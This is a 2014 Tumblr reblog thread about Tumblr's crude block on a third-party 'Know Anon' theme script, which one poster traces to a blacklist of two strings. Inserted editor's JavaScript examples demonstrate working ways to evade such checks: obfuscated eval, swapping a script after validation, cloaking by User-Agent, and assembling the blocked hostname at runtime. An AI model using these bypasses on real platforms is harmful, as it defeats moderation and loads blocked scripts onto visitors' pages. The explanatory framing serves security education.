Month: May 2014

barkentin:
Ahahah, tumblr that is the laziest thing ever.

I predict the next stop is to do this check server side.

Where it will take an entire five seconds to go around.

brocursion:

tbh i'd like to think that tumblr took a couple more steps than just this to fix the issue, and that this was just, like, an extra precautionary step, but EVEN SO it would still be incredibly funny bc it's just so ……………….. i can't even describe it. like, either someone at tumblr actually thought this would completely stump people, OR they think the tumblr userbase is so completely incompetent that they wouldn't figure it out? yikes

ALSO IF U GOT THE TIME/EFFORT, COULD YOU EXPLAIN HOW DOING THE CHECK SERVER-SIDE WOULD BE EASY TO GO AROUND … i've got almost no background in webdev whatsoever; i thought you usually want to do validations/checks like this on the backend?

barkentin:

You do! However, when you start letting users remote-include code (say, like linking JavaScript) it becomes tricky. They always have the option of obfuscating the JavaScript they send to you, or taking the remote JS and replacing it with something else after you've done the check server-side, or being really sneaky and serving you one script and something to everyone else! Which is why you never, never, ever trust user input.
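An added example (editor's code, not Tumblr's and not something any of the posters wrote) of why fetching the linked script server-side and scanning it does not close this off. It simulates that validator and the three tricks barkentin lists: obfuscating the script, swapping the file after the check, and serving the checker a different file than everyone else. The validator logic, the checker's User-Agent string and the script body are all assumptions, and the host is an in-process stand-in, not the real media.pixellab.co.

```javascript
// Added example, not Tumblr's code and not the posters' code. A simulated
// server-side validator that fetches each linked script and scans it, plus the
// three evasions described in the post: obfuscation, swap-after-check, and
// cloaking. Host, headers and script body are constructed stand-ins.
const BLOCKED_SUBSTRINGS = ["enableknowanon", "media.pixellab.co/ka/script.js"];

const SCRIPT_URL = "http://media.pixellab.co/ka/script.js?user_id=1383302445";
const SCRIPT_PATH = "/ka/script.js";
const THEME = `<script type="text/javascript" src="${SCRIPT_URL}"></script>`;

// Constructed stand-in for the real script: evaluating it returns a marker.
const REAL_SCRIPT = "(function () { var enableKnowAnon = true; return 'ka-loaded'; })()";
// Assumed request headers; the validator's User-Agent is a guess, not a real one.
const CHECKER_HEADERS = { "user-agent": "TumblrThemeValidator/1.0 (hypothetical)" };
const VISITOR_HEADERS = { "user-agent": "Mozilla/5.0" };

// Hypothetical validator: fetch every <script src> and reject on a blocked substring.
function validateTheme(themeHtml, fetchScript, headers) {
  for (const m of themeHtml.matchAll(/<script[^>]*\ssrc="([^"]+)"/gi)) {
    const body = fetchScript(m[1], headers).toLowerCase();
    if (BLOCKED_SUBSTRINGS.some((needle) => body.includes(needle))) return false;
  }
  return true;
}

// Simulated user-controlled host: each route is a handler that sees the request
// headers, so the user decides what to serve per requester and can change it later.
function makeHost() {
  const routes = new Map();
  return {
    publish(path, handler) { routes.set(path, handler); },
    fetch(url, headers) {
      const handler = routes.get(new URL(url).pathname);
      return handler ? handler(headers) : "";
    },
  };
}

// Run one scenario: validate the theme, then fetch the script as a visitor would.
function runScenario(host) {
  const passed = validateTheme(THEME, host.fetch, CHECKER_HEADERS);
  const result = eval(host.fetch(SCRIPT_URL, VISITOR_HEADERS)); // what a visitor's browser would run
  return { passed, result };
}

// Control: serving the real script to everyone is caught by the scan.
function scenarioHonest() {
  const host = makeHost();
  host.publish(SCRIPT_PATH, () => REAL_SCRIPT);
  return runScenario(host);
}

// 1. Obfuscation: the scanner sees only char codes; the browser rebuilds REAL_SCRIPT.
function scenarioObfuscated() {
  const codes = [...REAL_SCRIPT].map((c) => c.charCodeAt(0)).join(",");
  const host = makeHost();
  host.publish(SCRIPT_PATH, () => `eval(String.fromCharCode(${codes}))`);
  return runScenario(host);
}

// 2. Swap after check: a harmless file passes, then the file behind the saved URL changes.
function scenarioSwapAfterCheck() {
  const host = makeHost();
  host.publish(SCRIPT_PATH, () => "/* harmless placeholder */");
  const passed = validateTheme(THEME, host.fetch, CHECKER_HEADERS);
  host.publish(SCRIPT_PATH, () => REAL_SCRIPT); // the theme was already saved
  const result = eval(host.fetch(SCRIPT_URL, VISITOR_HEADERS));
  return { passed, result };
}

// 3. Cloaking: one file for the validator, another for everyone else.
function scenarioCloaking() {
  const host = makeHost();
  host.publish(SCRIPT_PATH, (headers) =>
    headers["user-agent"].startsWith("TumblrThemeValidator") ? "/* nothing to see */" : REAL_SCRIPT);
  return runScenario(host);
}
```

The only thing the validator and a visitor's browser share is the URL; everything behind that URL is under the user's control at every single request, which is the whole problem with checking remote includes once at save time.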

brocursion:

NOW I WANNA KNOW WHY IT DOESN’T WORK ANYMORE

OK I AM SUPER TIRED AND COMPLETELY LOSING IT, BUT I KEPT READING THAT WHEN PPL TRIED TO COPY-PASTE THE FIRST BIT OF JAVASCRIPT INTO THEIR CODE TUMBLR WOULDN'T LET THEM, AND I WANTED TO KNOW WHY, AND IF IT'S WHAT I THINK IT IS IT'S INCREDIBLY FUNNY

when i tested it out, it refused to save by giving me a pop-up window that just said 'woops :(' (real helpful error message btw), so i started messing around. here's the original snippet replicated from the post, bolded the important part:

<meta name="if:Enable Know Anon" content="0" /><script type="text/javascript" src="http://code.jquery.com/jquery-latest.min.js"></script><script type="text/javascript" src="http://media.pixellab.co/ka/script.js?user_id=1383302445&type=71214331{block:IfEnableKnowAnon}&enabled=true{/block:IfEnableKnowAnon}"></script>

if you change that bolded block name to any other name, tumblr will let you save the code, no error messages whatsoever

on the other hand, the names "IfEnableKnowAnons", "IfTenableKnowAnon" and even "IfTenableKnowAnons" (all of which still have the string 'enableknowanon' intact, as bolded) all trigger the 'woops' error msg

so … i think …….. i suspect ………. that at least one of the things tumblr did to prevent people from using this code was just to blacklist the string 'enableknowanon', and this fucking CRACKS ME THE HELL UP

disclaimer: could be wrong, only deduced from fifteen minutes of trial-and-error in the customize form, not the most rigorous method of ascertaining anything, would not recommend

last note: also think they blacklisted the string “media.pixellab.co/ka/script.js” GOD
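An added example (editor's code, not Tumblr's and not something brocursion posted) of why a substring blocklist on the saved theme HTML is trivial to get past. The two blocked strings are the ones brocursion inferred; the check itself is a hypothetical reconstruction of the 'woops :(' rejection, and the fake document exists only so the inline script can run outside a browser.

```javascript
// Added example (editor's, not Tumblr's or brocursion's code): a reconstruction
// of the substring blocklist brocursion inferred from the "woops :(" error, and a
// theme snippet that loads the same script URL without containing either string.
const BLOCKED_SUBSTRINGS = ["enableknowanon", "media.pixellab.co/ka/script.js"];

// Hypothetical reconstruction of the save-time check: a case-insensitive substring
// match on the raw theme HTML. Returns true where Tumblr would show "woops :(".
function themeIsRejected(themeHtml) {
  const lower = themeHtml.toLowerCase();
  return BLOCKED_SUBSTRINGS.some((needle) => lower.includes(needle));
}

// The snippet from the post, minus the jQuery include.
const ORIGINAL_SNIPPET =
  '<meta name="if:Enable Know Anon" content="0" />' +
  '<script type="text/javascript" src="http://media.pixellab.co/ka/script.js' +
  '?user_id=1383302445&type=71214331{block:IfEnableKnowAnon}&enabled=true{/block:IfEnableKnowAnon}"></script>';

// Same loader with the theme option renamed (as brocursion did) and the host and
// path assembled at runtime, so neither blocked string appears in the saved HTML.
const EVASIVE_SNIPPET =
  '<meta name="if:Show Anon" content="0" />' +
  '<script type="text/javascript">' +
  'var h = ["media", "pixellab", "co"].join(".");' +
  'var p = "/ka/" + "script" + ".js";' +
  'var s = document.createElement("script");' +
  's.src = "http://" + h + p + "?user_id=1383302445&type=71214331{block:IfShowAnon}&enabled=true{/block:IfShowAnon}";' +
  'document.head.appendChild(s);' +
  '</script>';

// Stand-in for the browser: collect static <script src> URLs, then run each inline
// script against a fake document that records any script element it appends.
function scriptUrlsLoadedBy(themeHtml) {
  const loaded = [];
  const fakeDocument = {
    createElement: () => ({}),
    head: { appendChild: (el) => loaded.push(el.src) },
  };
  for (const m of themeHtml.matchAll(/<script[^>]*\ssrc="([^"]+)"/g)) loaded.push(m[1]);
  for (const m of themeHtml.matchAll(/<script type="text\/javascript">([\s\S]*?)<\/script>/g)) {
    new Function("document", m[1])(fakeDocument);
  }
  return loaded;
}

// Tumblr renders {block:IfX} tags server-side; here they are still literal text and
// differ only by name between the two snippets, so strip them before comparing URLs.
function stripBlockTags(url) {
  return url.replace(/\{\/?block:[^}]+\}/g, "");
}

// The same script ends up loaded either way; only the evasive snippet survives the check.
function demo() {
  const [original] = scriptUrlsLoadedBy(ORIGINAL_SNIPPET);
  const [evasive] = scriptUrlsLoadedBy(EVASIVE_SNIPPET);
  return {
    originalRejected: themeIsRejected(ORIGINAL_SNIPPET),
    evasiveRejected: themeIsRejected(EVASIVE_SNIPPET),
    sameUrl: stripBlockTags(original) === stripBlockTags(evasive),
  };
}
```

Renaming the block tag is all the real-world bypass took; splitting the hostname is only there to show that the URL string can be kept out of the saved HTML entirely, which is why a blocklist on theme source can never be more than a speed bump.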


theblogofaudrey:

Exactly